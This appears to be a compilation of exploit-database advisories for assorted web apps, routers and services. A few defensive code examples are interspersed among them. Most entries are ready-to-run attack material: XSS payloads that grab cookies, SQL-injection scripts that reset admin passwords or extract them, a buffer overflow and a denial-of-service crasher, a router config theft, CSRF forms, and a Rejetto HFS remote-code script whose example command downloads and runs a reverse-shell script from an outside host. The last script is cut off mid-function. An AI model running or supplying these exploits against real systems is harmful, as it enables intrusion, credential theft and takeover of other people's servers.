# Vendor Homepage: https://www.elkarbackup.org/
# Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation
# Version: 1.3.3
# Tested on: Linux

Reproduction Steps:
1 - Go to the elakarbackup/login
2 - Login with default credentials
3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Parameter "Policy[name] and Policy[Description]"
4 - Click on Save
5 - We can see the Javascript Code executed Successfully

XSS Attack vectors :
"><svg/onload=alert(4)>
"><svg/onload=alert(document.cookie)>

Request :

POST /policy/1 HTTP/1.1
Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1123
Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
Connection: close
Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1?
Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505
Upgrade-Insecure-Requests: 1

Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on

Response :

<form data-bnv-message="Really delete policy "><svg/onload=alert(4)>?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline">
-
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

byte_message = bytes(payload)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
-
House Rental 1.0 - 'keywords' SQL Injection
# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-08-07
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip
# Version: 1.0
# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# OWASP Top Ten 2017: A1:2017-Injection
# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
# Vulnerability Description:
#   House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers
#   to execute arbitrary code on the hosting webserver via sending a malicious POST request.
# Vulnerable Source Code:
#   /config/config.php
#     11 try {
#     12     $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass);
#     13     $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
#   /index.php
#      5 if(isset($_POST['search'])) {
#      7     $keywords = $_POST['keywords'];
#     11     $keyword = explode(',', $keywords);
#     12     $concats = "(";
#     13     $numItems = count($keyword);
#     15     foreach ($keyword as $key => $value) {
#     17         if(++$i === $numItems){
#     18             $concats .= "'".$value."'";
#     19         }else{
#     20             $concats .= "'".$value."',";
#     23     $concats .= ")";
#     47     $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats");
#     48     $stmt->execute();

import requests, sys, re, json
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]

def sig():
    SIG = F[2]+" .-----.._ ,--. "+F[5]+" .__ .__________\n"
    SIG += F[2]+" | .. > "+F[4]+"___"+F[2]+" | | .--. "+F[5]+" | |__ ___.__. __| _\\_____ \\ ______ ____ ____\n"
    SIG += F[2]+" | |.' ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/ /__ __ "+F[5]+" | | < | |/ __ | _(__ < / ____/ __ _/ ___\\\n"
    SIG += F[2]+" | <"+F[4]+"/ "+F[2]+"* * *"+F[4]+" \\ "+F[2]+"/ \\/ \\ "+F[5]+" | Y \\___ / /_/ | / \\\\___ \\\\ ___\\ \\___\n"
    SIG += F[2]+" | |> ) "+F[2]+"* *"+F[4]+" / "+F[2]+"\\ \\ "+F[5]+" |___| / ____\____ |/______ /____ >\\___ \\___ >\n"
    SIG += F[2]+" |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+" \\/\\/ \\/ \\/ \\/ \\/ \\/\n"
    SIG += F[2]+" "+F[2]+"_______github.com/boku7_____ "+F[5]+" _______github.com/hyd3sec____\n_"+F[0]+S[0]
    return SIG

def header():
    head = S[3]+F[2]+' --- House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0]
    return head

def formatHelp(STRING):
    return S[3]+F[2]+STRING+S[0]

if __name__ == "__main__":
    print(header())
    print(sig())
    if len(sys.argv) != 2:
        print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
        print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0]))
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    if not re.match(r".*/$", SERVER_URL):
        SERVER_URL = SERVER_URL+'/'
    INDEX_URL = SERVER_URL + 'index.php'
    EXECUTE_URL = SERVER_URL + 'execute.php'
    LOGIN_URL = SERVER_URL + 'auth/login.php'
    s = requests.Session()
    get_session = s.get(INDEX_URL, verify=False)
    pdata = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'}
    SQLi = s.post(url=INDEX_URL, data=pdata, verify=False)
    if SQLi.status_code == 200:
        print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":")
        print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0])
    else:
        print(err+'Cannot send payload to webserver.')
        sys.exit(-1)
    try:
        print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0])
        EXECUTE = s.get(url=EXECUTE_URL, verify=False)
    except:
        print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload')
        sys.exit(-1)
    print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0])
    print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])
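The loop quoted from index.php above builds the IN list by wrapping each keyword in quotes and pasting it into the statement text, so prepare() receives whatever the client typed as SQL. The following is an added example, not code from the advisory or from House Rental: it reproduces that builder next to a parameterized version and runs both against a constructed in-memory SQLite table (the table name, columns and rows are made up for the demo; the original is PHP/MySQL, but the pattern is the same).

```python
import sqlite3

# Constructed stand-in for the room_rental_registrations_apartment table of the
# advisory; the table name, columns and rows are made up for this demonstration.
SAMPLE_ROWS = [
    ("Texas", "Austin", 1200),
    ("Ohio", "Columbus", 900),
    ("Texas", "Dallas", 1500),
]


def build_in_clause_unsafe(keywords):
    """Mirror of the quoted index.php loop: each comma-separated keyword is
    wrapped in single quotes and concatenated into the SQL text itself."""
    parts = keywords.split(",")
    return "(" + ",".join("'" + p + "'" for p in parts) + ")"


def build_in_clause_safe(keywords):
    """Return a placeholder list plus the values to bind. The keyword text
    never becomes part of the statement, so quotes in it are just data."""
    parts = keywords.split(",")
    placeholders = "(" + ",".join("?" for _ in parts) + ")"
    return placeholders, parts


def search_unsafe(conn, keywords):
    concats = build_in_clause_unsafe(keywords)
    sql = ("SELECT state, city, rent FROM apartments "
           f"WHERE state IN {concats} OR city IN {concats}")
    return conn.execute(sql).fetchall()


def search_safe(conn, keywords):
    placeholders, params = build_in_clause_safe(keywords)
    sql = ("SELECT state, city, rent FROM apartments "
           f"WHERE state IN {placeholders} OR city IN {placeholders}")
    # The IN list appears in two predicates, so the values are bound twice, in order.
    return conn.execute(sql, params + params).fetchall()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE apartments (state TEXT, city TEXT, rent INTEGER)")
    conn.executemany("INSERT INTO apartments VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def demo():
    """Run both builders on a benign search and on a keyword containing a quote."""
    conn = make_db()
    quoted = "O'Brien"  # a perfectly legitimate search term
    results = {
        "safe_benign": search_safe(conn, "Texas,Columbus"),
        "safe_quoted": search_safe(conn, quoted),
        "unsafe_fragment": build_in_clause_unsafe(quoted),
    }
    try:
        search_unsafe(conn, quoted)
        results["unsafe_quoted"] = "executed"
    except sqlite3.OperationalError as exc:
        # The quote terminated the string literal early: the term changed the SQL.
        results["unsafe_quoted"] = f"syntax error: {exc}"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

search_safe binds the keyword list twice because the IN list appears in two predicates; with PDO the equivalent is a list of ? placeholders generated from count($keyword) and the values passed to execute(). A keyword containing a quote then simply matches nothing, instead of changing the statement.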
-
Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
# Google Dork: "Powered By Best Support System"
# Date: 2020-08-23
# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
# Vendor: Appsbd [ https://appsbd.com ]
# Software Version: 3.0.4
# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
# Tested on: Kali Linux
# CVE: CVE-2020-24963
# CWE: CWE-79

[i] :: Info:
An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.4.

[$] :: Payloads:
13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>

[!] :: PoC (Burp Suite POST request):

POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://localhost
Connection: close
Referer: https://localhost/support-system/ticket/details/11.html
Cookie: [cookies_here]

app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
-
Intelbras Router RF 301K 1.1.2 - Authentication Bypass
# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass
# Date: 27/11/2020
# Exploit Author: Kaio Amaral
# Vendor Homepage: https://www.intelbras.com/pt-br/
# Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip
# Version: firmware version 1.1.2
# Tested on: kali, android

# POC
# 1. nc host port, ex: nc 10.0.0.1 80
# 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0

# Python3
import socket
from time import sleep

def exploit(host, port=80):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode()
    s.connect((host, port))
    s.send(pay)
    sleep(0.2)
    data = s.recv(17576)
    if len(data) > 1000:
        print("[+] Success.")
        return data.decode()
    print("[-] Failed. ")
    exit()

def file(data):
    with open("router.cfg", "w") as file:
        file.write(data[233:])
    print("[+] File Successfully Written.")

file(exploit("10.0.0.1"))
-
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
    http = urllib3.PoolManager()
    url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
    print(url)
    response = http.request('GET', url)
except Exception as ex:
    print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
    print(ex)
-
ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
# Date: 2020-11-20
# Exploit Author: Zagros Bingol
# Vendor Homepage: http://www.atx.com
# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
# Version: 2.0 and earlier
# Tested on: Debian 10 64bit

-------------------------------------
Endpoint: http://www.ip/domain.com/inc/user.ini
--------------------------------------

Proof-of-Concept:

#!/usr/bin/python3
#License: GNU General Public license v3.0
#Author: Zagros Bingol(Zagrosbingol@outlook.com)

import requests
import re

target = input("Target(ex:http://host): \n")
port = input("Port: \n")

def sploit(target, port):
    print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 - Credential Disclosure\n")
    r = requests.post(target + ":" + port + '/inc/user.ini')
    searching = re.findall(r"\[.{1,8}\]", str(r.text))
    print("Usernames:\n")
    print(", ".join(searching).replace("[", "").replace("]", ""))

def hash():
    r = requests.post(target + '/inc/user.ini')
    searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
    print("Hashes:\n")
    print(", ".join(searching).replace("[", "").replace("]", ""))

hash()
sploit(target, port)
-
YATinyWinFTP - Denial of Service (PoC)
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Date: 20.08.2020
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10

------------------------------[Description]---------------------------------
This exploit connects to the FTP service and sends a command which has a size of 256 bytes with a trailing space at the end. The result: it crashes.

-----------------------------[Exploit]---------------------------------------------
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import socket, sys

target = (sys.argv[1], int(sys.argv[2]))
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))
s.send(buffer)
s.close()

-----------------------------[how to run]-----------------------------
C:\> TinyWinFTP.exe servepath port
~$ python3 exploit.py targetip port
Boom!
-
TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp

######## Description ########

An attacker can change the admin e-mail address.

## Vulnerable

- Go to the admin page, view preferences
- Change the e-mail address

######## Proof of Concept ########

===> REQUEST <====

POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences
## < SNIPP >

verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save

#### Attack Code ####

<html>
  <body>
    <form action="http://localhost/typesetter/Admin/Preferences" method="POST">
      <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />
      <input type="hidden" name="email" value="[CHANGE HERE]" />
      <input type="hidden" name="oldpassword" value="" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="password1" value="" />
      <input type="hidden" name="algo" value="password_hash" />
      <input type="hidden" name="cmd" value="changeprefs" />
      <input type="hidden" name="aaa" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
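The forged form above works because the 'verified' value accepted by /Admin/Preferences can be supplied by a page the admin never meant to submit. The following is an added example, not TypeSetter's code, of how a per-session anti-CSRF token defends such a handler: a random token is generated for each login session, compared in constant time, and a value replayed from another session is rejected. The form body is the advisory's with the token replaced by a placeholder; the Session class, handle_changeprefs and EXPECTED_ORIGIN are assumptions for the demo.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Form body from the advisory's request with the real 'verified' value replaced
# by a placeholder that the demo fills in per session (constructed for this demo).
SAMPLE_BODY = ("verified=TOKEN_PLACEHOLDER&email=demo%40mail.com&oldpassword=&password="
               "&password1=&algo=password_hash&cmd=changeprefs&aaa=Save")

EXPECTED_ORIGIN = "http://localhost"  # assumption: the site's own origin


class Session:
    """Minimal server-side session (assumption for the demo): one unpredictable
    CSRF token per login, never derived from anything a third party can guess."""

    def __init__(self):
        self.csrf_token = secrets.token_hex(32)
        self.email = "admin@example.invalid"


def verify_csrf(session, submitted):
    """Constant-time comparison; a missing token is a failure, not a pass."""
    if not submitted:
        return False
    return hmac.compare_digest(session.csrf_token, submitted)


def handle_changeprefs(session, body, origin=None):
    """Handler for POST /Admin/Preferences with the checks the advisory's
    request shows to be missing or ineffective."""
    form = parse_qs(body, keep_blank_values=True)
    if not verify_csrf(session, form.get("verified", [None])[0]):
        return 403, "rejected: CSRF token mismatch"
    # Origin is a second, independent signal: browsers set it on cross-site posts.
    if origin is not None and origin != EXPECTED_ORIGIN:
        return 403, "rejected: cross-origin form post"
    if form.get("cmd", [""])[0] == "changeprefs":
        session.email = form.get("email", [""])[0]
    return 200, "preferences saved"


def demo():
    victim = Session()
    attacker = Session()  # a third party only knows a token from their own session
    forged = SAMPLE_BODY.replace("TOKEN_PLACEHOLDER", attacker.csrf_token)
    genuine = SAMPLE_BODY.replace("TOKEN_PLACEHOLDER", victim.csrf_token)
    forged_result = handle_changeprefs(victim, forged, origin="http://attacker.invalid")
    email_after_forgery = victim.email
    genuine_result = handle_changeprefs(victim, genuine, origin=EXPECTED_ORIGIN)
    return forged_result, email_after_forgery, genuine_result, victim.email


if __name__ == "__main__":
    print(demo())
```

The token check alone is sufficient when the token is unpredictable and bound to the session; the Origin comparison is defence in depth for the case where a token leaks, and a SameSite cookie attribute would stop the browser from attaching the session cookie to the cross-site post in the first place.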
-
Online Shopping Alphaware 1.0 - Error Based SQL injection
# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
# Exploit Author: Moaaz Taha (0xStorm)
# Date: 2020-08-20
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

# Description
The parameter "id" is vulnerable to Error-Based blind SQL injection in the path "/alphaware/details.php?id=431860", which leads to retrieval of all databases.

#POC
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
-
Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
# Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
# Google Dork: inurl:''com_gmapfp''
# Date: 2020-03-27
# Exploit Author: ThelastVvV
# Vendor Homepage: https://gmapfp.org/
# Version: Version J3.5 /J3.5free
# Tested on: Ubuntu
# CVE: CVE-2020-23972

# Description:
An attacker can access the upload function of the application without authenticating to the application and can also upload files, due to the issue of unrestricted file uploads, whose restriction can be bypassed by changing the content-type and the filename to a double extension.

# PoC: Version J3.5
http://127.0.0.1/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

- Once the attacker can locate the unauthenticated file upload form, the attacker can bypass the restriction by changing the content-type and naming the file with a double extension, file.html.gif, then can open file.html

# Impact
The attacker can upload malicious files, which can cause defacement of the site, or upload a large amount of files until it causes a denial of service attack against the Webapp/Server

# Dir File Path:
http://127.0.0.1///images/stories/gmapfp/test.html.gif
http://127.0.0.1///images/stories/gmapfp/test.html
http://127.0.0.1///images/gmapfp/test2.html.gif
http://127.0.0.1///images/gmapfp/test2.html.gif

# Issues are fixed, please update to the latest version
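The bypass described above relies on the upload check trusting the declared content-type and looking only at the last extension of test.html.gif. As an added example (not GMapFP's code), the following validator applies the checks a defender would want: exactly one extension, an allowlist of image types, the file's leading bytes matching that type, and a server-generated name so the client's filename is never used on disk. The sample uploads are constructed; ALLOWED_SIGNATURES and validate_upload are assumptions for the demo.

```python
import os
import secrets

# Assumption for the demo: the only types the gallery accepts, keyed by the single
# extension they may carry, with the leading bytes a genuine file of that type has.
ALLOWED_SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Constructed sample uploads (name, declared content-type, first bytes).
# The first one is the double-extension trick described in the advisory.
SAMPLE_UPLOADS = [
    ("test.html.gif", "image/gif", b"<html><body>not an image</body></html>"),
    ("photo.gif", "image/gif", b"GIF89a" + b"\x00" * 16),
    ("page.html", "image/gif", b"GIF89a" + b"\x00" * 16),
    ("holiday.PNG", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ("../../evil.gif", "image/gif", b"GIF89a" + b"\x00" * 16),
]


def validate_upload(filename, content_type, data):
    """Return (stored_name, reason). stored_name is None when the upload is refused.

    content_type is accepted as an argument only to make the point: it is set by
    the client and plays no part in the decision."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        # Refuses 'file', '.htaccess' and every 'file.html.gif'-style name.
        return None, "refused: name must be <basename>.<one extension>"
    ext = parts[1].lower()
    signatures = ALLOWED_SIGNATURES.get(ext)
    if signatures is None:
        return None, f"refused: extension .{ext} not allowed"
    if not data.startswith(signatures):
        return None, "refused: content does not start like a real " + ext.upper()
    # Never reuse the client's name on disk: a random name with the verified extension.
    return secrets.token_hex(8) + "." + ext, "accepted"


def check_uploads(uploads=SAMPLE_UPLOADS):
    """Verdict for each sample, in order."""
    return [(name, validate_upload(name, ctype, data)[1]) for name, ctype, data in uploads]


if __name__ == "__main__":
    for name, verdict in check_uploads():
        print(f"{name:20} {verdict}")
```

Serving the upload directory with script execution disabled (and, ideally, from a separate origin) is the complementary control: even a file that passes validation is then only ever delivered as a static image.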
-
Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link: https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS

"""
~ VULNERABILITY DETAILS ~

https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>

# WordPress sites that use EventOn Calendar cause a reflected xss vulnerability with javascript payloads injected into the search field.
# The following python code will inject javascript code and print out the url that will be sent to the victim. If you use unicode characters for xss, the exploit will print the page source.

##USAGE##
$ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'

##OUTPUT##
[+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
"""

import requests
import sys
import argparse
from colorama import Fore

def vuln_reflected(url, payload):
    s = requests.Session()
    get_request = s.get(url+payload)
    if get_request.status_code == 500:
        print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")
    else:
        content_result = str(get_request.content)
        search_find = content_result.find(payload)
        if search_find != -1:
            print(Fore.GREEN+"[+] "+str(url)+str(payload))
        else:
            print(content_result)

def main():
    desc = "Wordpress EventON Calendar Plugin XSS"
    parser = argparse.ArgumentParser(description=desc)
    exp_option = parser.add_argument_group('')
    parser.add_argument("--exploit", help ="", action='store_true')
    parser.add_argument("--url",help="", type=str, required=False)
    parser.add_argument("--payload",help="",type=str,required=False)
    args = parser.parse_args()
    if args.exploit:
        if args.url:
            if args.payload:
                url = args.url
                payload = args.payload
                vuln_reflected(url, payload)

if __name__ == '__main__':
    main()
-
Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection
# Exploit Title: Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection
# Date: 2020-08-23
# Exploit Author: @naivenom
# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
# Version: 1.0
# Tested on: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

The parameter "email" is vulnerable to Time-Based blind SQL injection in the path "/medical/login.php", which leads to retrieval of all databases.

#exploit
import re
import requests
from bs4 import BeautifulSoup
import sys
import urllib3
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# We can test the time based blind sqli with this script. This script tests each character of the password column from the users table
# and retrieves the password of the admin user.
def time_based_blind_sqli(injection_string):
    target = "http://localhost:81/medical-store-source/login.php"
    for j in range(32,126):
        data = {'email': "%s" % (injection_string.replace("[CHAR]", str(j))), 'password':'xJXb', 'login':''}
        tim = time.time()
        r = requests.post(target,data = data, verify=False)
        nowtime = time.time()
        curren = nowtime-tim
        if curren <= 4:
            return j
    return None

def main():
